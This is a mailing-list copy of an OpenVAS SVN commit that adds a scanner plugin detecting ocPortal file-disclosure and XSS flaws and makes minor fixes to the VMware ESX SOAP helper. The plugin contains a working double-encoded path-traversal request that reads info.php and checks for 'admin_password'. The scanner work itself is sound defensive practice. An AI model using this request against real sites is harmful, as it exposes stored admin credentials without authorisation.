[Openvas-commits] r13190 - in trunk/openvas-plugins: . scripts
scm-commit at wald.intevation.org
scm-commit at wald.intevation.org
Tue Apr 3 18:29:58 CEST 2012
Author: mime
Date: 2012-04-03 18:29:57 +0200 (Tue, 03 Apr 2012)
New Revision: 13190
Added:
trunk/openvas-plugins/scripts/gb_ocportal_52768.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/vmware_esx.inc
Log:
Added new plugin. Minor updates.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2012-04-03 14:01:40 UTC (rev 13189)
+++ trunk/openvas-plugins/ChangeLog 2012-04-03 16:29:57 UTC (rev 13190)
@@ -1,3 +1,11 @@
+2012-04-03 Michael Meyer <michael.meyer at greenbone.net>
+
+ * scripts/gb_ocportal_52768.nasl:
+ Added new plugin.
+
+ * scripts/vmware_esx.inc:
+ Minor updates.
+
2012-04-03 Antu Sanadi <santu at secpod.com>
* scripts/gb_fedora_2012_3412_python-sqlalchemy0.5_fc16.nasl,
Added: trunk/openvas-plugins/scripts/gb_ocportal_52768.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ocportal_52768.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ocportal_52768.nasl 2012-04-03 16:29:57 UTC (rev 13190)
@@ -0,0 +1,103 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ocPortal Arbitrary File Disclosure and Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103459);
+ script_bugtraq_id(52768);
+ script_cve_id("CVE-2012-1471","CVE-2012-1470");
+ script_version ("$Revision$");
+
+ script_name("ocPortal Arbitrary File Disclosure and Cross Site Scripting Vulnerabilities");
+
+desc = "Overview:
+ocPortal is prone to multiple cross-site scripting vulnerabilities and
+an arbitrary file-disclosure vulnerability because the application
+fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site, steal cookie-based authentication credentials, and obtain
+sensitive information.
+
+ocPortal versions prior to 7.1.6 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/52768
+http://ocportal.com/site/news/view/new-releases/ocportal-7-1-6-released.htm?filter=1%2C2%2C3%2C29%2C30
+http://ocportal.com/start.htm
+http://ocportal.com/site/news/view/ocportal-security-update.htm
+https://www.htbridge.com/advisory/HTB23078";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-04-03 14:06:27 +0200 (Tue, 03 Apr 2012)");
+ script_description(desc);
+ script_summary("Determine if it is possible to read info.php");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/ocportal",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+
+ if(http_vuln_check(port:port, url:url,pattern:"Powered by ocPortal")) {
+
+ url = string(dir, "/site/catalogue_file.php?original_filename=1.txt&file=%252e%252e%252f%252e%252e%252finfo.php");
+
+ if(http_vuln_check(port:port, url:url,pattern:"admin_password")) {
+
+ security_warning(port:port);
+ exit(0);
+ }
+
+ }
+}
+
+exit(0);
+
Property changes on: trunk/openvas-plugins/scripts/gb_ocportal_52768.nasl
___________________________________________________________________
Added: svn:keywords
+ Id Revision Date
Modified: trunk/openvas-plugins/scripts/vmware_esx.inc
===================================================================
--- trunk/openvas-plugins/scripts/vmware_esx.inc 2012-04-03 14:01:40 UTC (rev 13189)
+++ trunk/openvas-plugins/scripts/vmware_esx.inc 2012-04-03 16:29:57 UTC (rev 13190)
@@ -47,7 +47,7 @@
if(!recv) {
_esx_error(data:'ESXi 4.1: Initial connect failed\n');
return FALSE;
- }
+ }
c = eregmatch(pattern:'Set-Cookie: vmware_soap_session="([^"]+)"',string:recv);
@@ -58,9 +58,17 @@
sess = c[1];
+ sM = eregmatch(pattern:'<sessionManager type="SessionManager">(.*)</sessionManager>', string:recv);
+
+ if(!isnull(sM[1])) {
+ SessionManager = sM[1];
+ } else {
+ SessionManager = "ha-sessionmgr";
+ }
+
recv = _esxi_4_1_soap_request(data:'
<Login xmlns="urn:vim25">
- <_this type="SessionManager">ha-sessionmgr</_this>
+ <_this type="SessionManager">' + SessionManager + '</_this>
<userName>' + user + '</userName>
<password>' + pass + '</password>
</Login>',
@@ -206,6 +214,14 @@
return FALSE;
}
+ hs = eregmatch(pattern:'<obj type="HostSystem">(.*)</obj>', string:recv);
+
+ if(!isnull(hs[1])) {
+ HostSystem = hs[1];
+ } else {
+ HostSystem = "ha-host";
+ }
+
recv = _esxi_4_1_soap_request(data:'
<RetrieveProperties xmlns="urn:vim25">
<_this type="PropertyCollector">ha-property-collector</_this>
@@ -217,7 +233,7 @@
<pathSet>configManager.patchManager</pathSet>
</propSet>
<objectSet>
- <obj type="HostSystem">ha-host</obj>
+ <obj type="HostSystem">' + HostSystem + '</obj>
</objectSet>
</specSet>
</RetrieveProperties>',
@@ -228,9 +244,17 @@
return FALSE;
}
+ hpm = eregmatch(pattern:'<val type="HostPatchManager" xsi:type="ManagedObjectReference">(.*)</val>', string: recv);
+
+ if(!isnull(hpm[1])) {
+ HostPatchManager = hpm[1];
+ } else {
+ HostPatchManager = 'ha-host-patch-manager';
+ }
+
recv = _esxi_4_1_soap_request(data:'
<QueryHostPatch_Task xmlns="urn:vim25">
- <_this type="HostPatchManager">ha-host-patch-manager</_this>
+ <_this type="HostPatchManager">' + HostPatchManager + '</_this>
</QueryHostPatch_Task>',
search:"Query-");
@@ -314,7 +338,7 @@
if (!isnull(date) && (isnull(last) || date > last)) last = date;
}
- if(ib = eregmatch(pattern:"<id>(ESXi?[0-9]+-20[0-9][0-9][0-9][0-9][0-9]+-[A-Z]+)</id>", string: line)) {
+ if(ib = eregmatch(pattern:"<id>(ESXi?[0-9]+-.*)</id>", string: line)) {
if(!isnull(ib[1])) {
installed_bulletins += ib[1] + '\n';
}
@@ -390,6 +414,16 @@
response = recv;
+ if("<faultstring>" >< response) {
+
+ fault = eregmatch(pattern:"<faultstring>(.*)</faultstring>", string: response);
+ if(!isnull(fault[1])) {
+ response = fault[1];
+ return FALSE;
+ }
+
+ }
+
close(soc);
if(!recv || recv !~ "HTTP/1.[0|1] 200")return FALSE;
More information about the Openvas-commits
mailing list